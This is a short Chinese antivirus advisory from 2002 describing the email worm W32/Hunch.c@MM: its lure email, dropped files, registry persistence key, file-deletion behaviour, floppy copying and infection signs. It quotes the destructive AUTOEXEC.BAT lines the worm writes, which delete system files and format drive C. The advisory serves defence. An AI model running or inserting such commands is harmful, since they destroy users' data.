|
新病毒Hunch问世
金山毒霸
病毒名称:W32/Hunch.c@MM
发现日期:2002-04-06
最早出现国家:秘鲁
感染长度:73728字节
病毒类型:邮件病毒
病毒特征:
该邮件蠕虫会向Outlook地址簿中的所有收件人发送带毒邮件,将自身拷贝至软盘上,同时会删除本地系统上的文件。其邮件格式如下:
主题:可执行文件名 (变化不定的)
内文:Tal como te promet? te env韔 mi foto en el archivo adjunto...
附件:可执行文件名 (变化不定的).EXE
例如:
附件运行后,病毒就会感染计算机,同时打开一个有如下图片的窗口:
然后,它会在Windows系统目录下生成THD16.EXE及MSOFFICE.EXE两个文件,并创建注册表运行键,使得系统重启时病毒自动运行:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run\THD16=C:\WINDOWS\SYSTEM\THD16.EXE
另外,此病毒还会删除Windows目录及其子目录下、后缀名为如下所示的任意五个文件:
BAK、BMP、CDR 、CDX 、CHM 、DBF 、DOC 、DWG 、HLP 、HTM 、ICO 、JPG 、MDB 、MP3 、WAV 、XLS。而且,它还会周期性地将自身保存在A盘的根目录下,其保存的文件名与A盘上现有的文件名相同,比如,A盘存在一个A:\temp.dll文件,病毒就会以A:\temp.dll.EXE命名,而原文件的属性被设置为隐藏。
该病毒还会以如下指令来覆盖自动批处理文件AUTOEXEC.BAT :
@echo off
DEL \*.SYS \*.DLL \*.OCX CLS > FORMAT C: /u /v:THD16 /autotest
病毒所作的每一个动作都会被记录在Windows系统目录下的两个文件当中:
1.ListWin.txt (被病毒最新删除的五个文件的日志文件)
2.WinList.txt (病毒用以拷贝至A盘的所有文件名的日志文件)
中毒迹象:
中毒后会在Windows系统目录下出现如下文件:
1.THD16.EXE
2.MSOFFICE.EXE
3.ListWin.txt
4.WinList.txt
传染方式:
病毒运行后,会向Outlook地址簿中的所有收件人发送带毒邮件,并将自身拷贝至软盘上,同时会删除Windows及其子目录下的文件。
(金山反病毒资讯网 ,2002-04-12)
|
